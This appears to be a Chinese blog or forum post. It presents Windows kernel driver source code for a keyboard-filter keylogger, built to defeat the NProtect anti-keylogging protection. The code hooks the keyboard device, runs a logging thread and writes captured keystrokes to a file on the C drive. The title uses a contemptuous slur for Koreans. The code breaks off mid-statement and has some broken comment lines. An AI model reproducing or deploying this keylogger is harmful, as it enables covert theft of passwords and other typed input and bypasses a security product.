看棒子不顺眼，破解NProtect，键盘驱动级截取键盘记录

NProtect，是用驱动加载进入ring0级别，每个进程注入一个钩子，

用键盘中断技术写的一个钩子，

本人就用驱动对付他，

废话少说，看代码，

 

//#include  <ntddk.h>
#include "kbhook.h"
#include "ScanCode.h"
#include   <windef.h>
int numPendingIrps=0;
//
//ICTOL 以及控制设备的相关变量
//
#define IOCTL_PASSPROCESSID /
    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
UNICODE_STRING  devNameUnicd;
UNICODE_STRING  devLinkUnicd;
PDEVICE_OBJECT  pDevice;  //控制设备的设备对象
NTSTATUS  DeviceIoControlDispatch(IN  PDEVICE_OBJECT  pDeviceObject,IN  PIRP  pIrp); //DeviceIoControl的处理函数

VOID OnUnload( IN PDRIVER_OBJECT theDriverObject )
{   
 KTIMER kTimer;
 LARGE_INTEGER timeout; 
 PDEVICE_EXTENSION pKeyboradDeviceExtension;
 pKeyboradDeviceExtension=(PDEVICE_EXTENSION) theDriverObject->DeviceObject->DeviceExtension;
 IoDetachDevice(pKeyboradDeviceExtension->pKeyboardDevice);
 timeout.QuadPart=1000000;//1s
 KeInitializeTimer(&kTimer);
 while(numPendingIrps > 0)
 {
  KeSetTimer(&kTimer,timeout,NULL);
  KeWaitForSingleObject(&kTimer,Executive,KernelMode,FALSE,NULL);
  
 }
 pKeyboradDeviceExtension->bThreadTerminate=TRUE;
 KeReleaseSemaphore(&pKeyboradDeviceExtension->semQueue,0,1,TRUE);//让独立的记录线程获得执行机会
 KeWaitForSingleObject(pKeyboradDeviceExtension->pThreadObject,
  Executive,KernelMode,FALSE,NULL);             //结束独立的记录线程
 ZwClose(pKeyboradDeviceExtension->hLogFile);      //关闭文件句柄
 IoDeleteDevice(theDriverObject->DeviceObject);    //删除设备对象
 
 IoDeleteSymbolicLink(&devLinkUnicd);
 IoDeleteDevice(pDevice);
 DbgPrint("My Driver Unloaded!");
 return;
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,IN PUNICODE_STRING RegistryPath)
{
 

 NTSTATUS status={0};
 int i;
 PDEVICE_EXTENSION pKeyboardDeviceExtension;
 
 IO_STATUS_BLOCK file_status;
 OBJECT_ATTRIBUTES obj_attrib;
 CCHAR ntNameFile[100]="//DosDevices//c://kbhook.txt";
 STRING ntNameString;
 UNICODE_STRING uFileName;
 
 for( i=0 ; i < IRP_MJ_MAXIMUM_FUNCTION;i++)
  
  theDriverObject->MajorFunction[i] = DispatchPassDown;
 theDriverObject->MajorFunction[IRP_MJ_READ]=DispatchRead;
 
 HookKeyboard(theDriverObject);
 //建立一个线程用来记录键盘动作
 InitThreadKeyLogger(theDriverObject);
 
 /
 初始化一个旋转锁来访问链表///
 pKeyboardDeviceExtension=(PDEVICE_EXTENSION)theDriverObject->DeviceObject->DeviceExtension;
 InitializeListHead(&pKeyboardDeviceExtension->QueueListHead);

 KeInitializeSpinLock(&pKeyboardDeviceExtension->lockQueue);
 KeInitializeSemaphore(&pKeyboardDeviceExtension->semQueue,0,MAXLONG);
 创建一个纪录文件///
 RtlInitAnsiString(&ntNameString,ntNameFile);
 RtlAnsiStringToUnicodeString(&uFileName,&ntNameString,TRUE);
 InitializeObjectAttributes(&obj_attrib,&uFileName,
        OBJ_CASE_INSENSITIVE,
        NULL,NULL);
 
 status=ZwCreateFile(&pKeyboardDeviceExtension->hLogFile,
  GENERIC_WRITE,
  &obj_attrib,
  &file_status,
  NULL,
  FILE_ATTRIBUTE_NORMAL,
  0,
  FILE_OPEN_IF,
  FILE_SYNCHRONOUS_IO_NONALERT,
  NULL,
  0);
 RtlFreeUnicodeString(&uFileName);
 
 theDriverObject->DriverUnload=OnUnload;

  //NTSTATUS  Status;
  //PDEVICE_OBJECT  pDevice;
  RtlInitUnicodeString(&devNameUnicd,L"//Device//PANZER3");
  RtlInitUnicodeString(&devLinkUnicd,L"//??//PANZER3");
  status=IoCreateDevice(theDriverObject,0,&devNameUnicd,FILE_DEVICE_UNKNOWN,
      0,FALSE,&pDevice);
   if(!NT_SUCCESS(status))
  {
      DbgPrint(("Can not create device./n"));
      return status;
  }
  status=IoCreateSymbolicLink(&devLinkUnicd,&devNameUnicd)